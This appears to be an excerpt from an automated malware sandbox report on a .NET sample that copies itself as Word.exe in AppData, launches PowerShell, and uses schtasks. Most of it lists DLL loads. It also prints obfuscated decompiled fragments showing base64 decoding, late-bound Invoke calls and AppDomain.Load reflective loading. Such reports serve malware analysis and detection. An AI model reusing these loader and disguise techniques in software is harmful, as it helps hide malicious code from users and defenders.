                    Source: C:\Users\user\Desktop\file.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                    Source: C:\Users\user\AppData\Roaming\Word.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\Word.exeSection loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Roaming\Word.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\Word.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\Word.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\Word.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\Word.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\Word.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\Word.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\Word.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\Word.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\Word.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Roaming\Word.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\Word.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\Word.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\Word.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\Word.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\Word.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\Word.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\Word.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\Word.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\Word.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\Word.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Roaming\Word.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\Word.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\Word.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\Word.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\Word.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\Word.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\Word.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\Word.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\Word.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\Word.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\Word.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Roaming\Word.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\Word.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\Word.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\Word.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\Word.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\Word.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\Word.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\Word.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\Word.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\Word.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                    Source: Word.lnk.0.drLNK file: ..\..\..\..\..\Word.exe
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                    Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                    Data Obfuscation

                    barindex
                    Source: file.exe, uEQDD3u1jGnJYt3mdJfu6rTjMrGOSgb217iI9FQzr.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{_4RAAUk7QYYdq5C5Xl7TeS7uEMYdqQMRzkeS1SsiRmH1sNGBn9MLxdVpF.lfkj5o0jgYcg150GJxwCqLzvOjZiQGcJgoXeuT764dhSh70It70KxS8s,_4RAAUk7QYYdq5C5Xl7TeS7uEMYdqQMRzkeS1SsiRmH1sNGBn9MLxdVpF.jokzdDiPkRx8uIfBrGLWdt6mmQ1BT3zKYWShSFDf7R01EANG6gHc5QsJ,_4RAAUk7QYYdq5C5Xl7TeS7uEMYdqQMRzkeS1SsiRmH1sNGBn9MLxdVpF.FbPaFUO55gCykI9qOTMXgURryVQlpYrZAQlkFSj6qVuIeHiAywz0ZPXo,_4RAAUk7QYYdq5C5Xl7TeS7uEMYdqQMRzkeS1SsiRmH1sNGBn9MLxdVpF.gyEYYIb2Qrx1nY2ULwbNgwV3Vd1cDSTSMzpDv8uEy1eo7htJd4WyIWJa,RLNc59m3K5qBU9nVpBi0AKzQWHnZ4GB7uwf5x7A0VpPRtOmln5U0LHjGRFKVDduY3yBpI1XMO.iQbtMMDbqvw782M0VjWlH0OXdI6OrmMnRHmTbIGY0pzJfs0XOz9ZgACkTrDlsMwqrwokNcYpd()}}, (string[])null, (Type[])null, (bool[])null, true)
                    Source: file.exe, uEQDD3u1jGnJYt3mdJfu6rTjMrGOSgb217iI9FQzr.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{IWNQNfBfJyp9J30iqt4h6bFbIc3K1nHz5RLjnzNHF[2],RLNc59m3K5qBU9nVpBi0AKzQWHnZ4GB7uwf5x7A0VpPRtOmln5U0LHjGRFKVDduY3yBpI1XMO.VkdyIkaSgcgLysr59lJnb5xqWlmjdNthPGEqu6t9D6XLH1PJCHj9C638z06jGOoaAMqntkAzF(Convert.FromBase64String(IWNQNfBfJyp9J30iqt4h6bFbIc3K1nHz5RLjnzNHF[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                    Source: file.exe, uEQDD3u1jGnJYt3mdJfu6rTjMrGOSgb217iI9FQzr.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { IWNQNfBfJyp9J30iqt4h6bFbIc3K1nHz5RLjnzNHF[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                    Source: Word.exe.0.dr, uEQDD3u1jGnJYt3mdJfu6rTjMrGOSgb217iI9FQzr.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{_4RAAUk7QYYdq5C5Xl7TeS7uEMYdqQMRzkeS1SsiRmH1sNGBn9MLxdVpF.lfkj5o0jgYcg150GJxwCqLzvOjZiQGcJgoXeuT764dhSh70It70KxS8s,_4RAAUk7QYYdq5C5Xl7TeS7uEMYdqQMRzkeS1SsiRmH1sNGBn9MLxdVpF.jokzdDiPkRx8uIfBrGLWdt6mmQ1BT3zKYWShSFDf7R01EANG6gHc5QsJ,_4RAAUk7QYYdq5C5Xl7TeS7uEMYdqQMRzkeS1SsiRmH1sNGBn9MLxdVpF.FbPaFUO55gCykI9qOTMXgURryVQlpYrZAQlkFSj6qVuIeHiAywz0ZPXo,_4RAAUk7QYYdq5C5Xl7TeS7uEMYdqQMRzkeS1SsiRmH1sNGBn9MLxdVpF.gyEYYIb2Qrx1nY2ULwbNgwV3Vd1cDSTSMzpDv8uEy1eo7htJd4WyIWJa,RLNc59m3K5qBU9nVpBi0AKzQWHnZ4GB7uwf5x7A0VpPRtOmln5U0LHjGRFKVDduY3yBpI1XMO.iQbtMMDbqvw782M0VjWlH0OXdI6OrmMnRHmTbIGY0pzJfs0XOz9ZgACkTrDlsMwqrwokNcYpd()}}, (string[])null, (Type[])null, (bool[])null, true)
                    Source: Word.exe.0.dr, uEQDD3u1jGnJYt3mdJfu6rTjMrGOSgb217iI9FQzr.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{IWNQNfBfJyp9J30iqt4h6bFbIc3K1nHz5RLjnzNHF[2],RLNc59m3K5qBU9nVpBi0AKzQWHnZ4GB7uwf5x7A0VpPRtOmln5U0LHjGRFKVDduY3yBpI1XMO.VkdyIkaSgcgLysr59lJnb5xqWlmjdNthPGEqu6t9D6XLH1PJCHj9C638z06jGOoaAMqntkAzF(Convert.FromBase64String(IWNQNfBfJyp9J30iqt4h6bFbIc3K1nHz5RLjnzNHF[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                    Source: Word.exe.0.dr, uEQDD3u1jGnJYt3mdJfu6rTjMrGOSgb217iI9FQzr.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { IWNQNfBfJyp9J30iqt4h6bFbIc3K1nHz5RLjnzNHF[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                    Source: file.exe, uEQDD3u1jGnJYt3mdJfu6rTjMrGOSgb217iI9FQzr.cs.Net Code: _7jMSGkZwhKQVohw0oZ5Md5Oz1qwwxXktQrdXNNfbB System.AppDomain.Load(byte[])
                    Source: file.exe, uEQDD3u1jGnJYt3mdJfu6rTjMrGOSgb217iI9FQzr.cs.Net Code: lATz7EGifXIK288ROrMFnjJccSvuS7KesaYcv3Aw2 System.AppDomain.Load(byte[])
                    Source: file.exe, uEQDD3u1jGnJYt3mdJfu6rTjMrGOSgb217iI9FQzr.cs.Net Code: lATz7EGifXIK288ROrMFnjJccSvuS7KesaYcv3Aw2
                    Source: Word.exe.0.dr, uEQDD3u1jGnJYt3mdJfu6rTjMrGOSgb217iI9FQzr.cs.Net Code: _7jMSGkZwhKQVohw0oZ5Md5Oz1qwwxXktQrdXNNfbB System.AppDomain.Load(byte[])
                    Source: Word.exe.0.dr, uEQDD3u1jGnJYt3mdJfu6rTjMrGOSgb217iI9FQzr.cs.Net Code: lATz7EGifXIK288ROrMFnjJccSvuS7KesaYcv3Aw2 System.AppDomain.Load(byte[])
                    Source: Word.exe.0.dr, uEQDD3u1jGnJYt3mdJfu6rTjMrGOSgb217iI9FQzr.cs.Net Code: lATz7EGifXIK288ROrMFnjJccSvuS7KesaYcv3Aw2
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFAAC36D2A5 pushad ; iretd 7_2_00007FFAAC36D2A6
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFAAC552316 push 8B485F92h; iretd 7_2_00007FFAAC55231B
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFAAC35D2A5 pushad ; iretd 11_2_00007FFAAC35D2A6
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFAAC542316 push 8B485F93h; iretd 11_2_00007FFAAC54231B
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FFAAC35D2A5 pushad ; iretd 14_2_00007FFAAC35D2A6
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FFAAC470DD0 pushad ; retf 14_2_00007FFAAC470E0D
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FFAAC472A7D push E95E0372h; ret 14_2_00007FFAAC472AC9
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FFAAC542316 push 8B485F93h; iretd 14_2_00007FFAAC54231B
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00007FFAAC35D2A5 pushad ; iretd 16_2_00007FFAAC35D2A6
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00007FFAAC542316 push 8B485F93h; iretd 16_2_00007FFAAC54231B
                    Source: file.exe, YUxmYeJDPRnlw3T.csHigh entropy of concatenated method names: 'fHLOyVH2K85hG1c', 'Nj4BjAq5QDTawyp', 'NVQdiEA4atNmfH2', 'roLdd8FocBPmcSW3jWMzKVTgUvgrsdzdnAivvEQ74fnDPQfO4wvIwOr0Y2bwmvoxvRzRK9l0SPYOJH4JUyLEJoN7xTX', 'uSpsTOE1TNgf4Sn9Ym3ThUEw5cNz1VAXFQVgkvz4bTO6uNUi2oozVQSkDc4j9MFFUvEPhmWtytJldoYCcQDZxkxI62R', 'rSp9F2OqrcFdgQgRrxnOTxAUrXLAVYgaZrjpc8i5ocVE9lJBTK40mq1A8Wyyj0ZMYd0UMiMZ1YZJkuEiax2UWVMTh9q', 'Xw2PA45RnKlmWL1PepvBqLxa1XPrKgQhE2n8HbJiwFuDs79iLe1QiOr3i6MoLkgNBJJQ8NRz3Yltm4dIHrC93OPQIQi', 'rs5Q6SxzQBMFrjE0XBaNmiZAxEV6xADsYz8OqtjE31PBnFAadSGtNKppV0LGNxOofcxeey4JSIQILFEpYREDwcJvpki', 'vbkC3oZc3EAvpbzecwyokHeOyoY1WNif8edYgLPiXF5lAO3GynSkppZRBviou9Vj3CQHijUYPS50al5qSAJOjXIK4jL', 'wZkWBWuTFWXqwY6UyVpmuEvY4am8YRyliv5WevaCTx8KlmiOCa46bt53PctU17gjWaNgKbmhOT3uQ7Sy68YL6J54kZM'
